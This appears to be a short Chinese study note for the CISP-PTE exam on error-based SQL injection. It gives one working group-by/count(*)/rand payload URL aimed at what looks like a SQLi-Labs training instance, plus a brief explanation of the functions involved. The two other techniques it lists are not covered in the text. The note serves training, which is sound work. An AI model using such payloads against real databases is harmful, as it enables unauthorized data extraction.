【PTE-day03 报错注入】

报错注入

    • 1、报错注入 group by count
    • 2、报错注入 extractvalue
    • 3、报错注入updatexml

1、报错注入 group by count

http://124.222.124.9:8888/Less-5/?id=-1' union select 1,count(*),concat((select database()),ceil(rand(0)*2)) as a from information_schema.tables group by a %23

【PTE-day03 报错注入】_第1张图片

涉及到的函数
floor() 向下取整
ceil() 向上取整
rand() 产生[0,1)之间的随机数
count() 统计总数函数
group by() 分组语法
分配初始创建一个虚拟表 分两种
第一种 第一次取数据在虚拟表中进行索引,索引未发现同类项,进行二次取数,进行写入
第二种 第一次取数据在虚拟表中进行索引,索引发现同类型,直接写入,不进行二次取数

你可能感兴趣的:(CISP-PTE,数据库,mybatis,sql)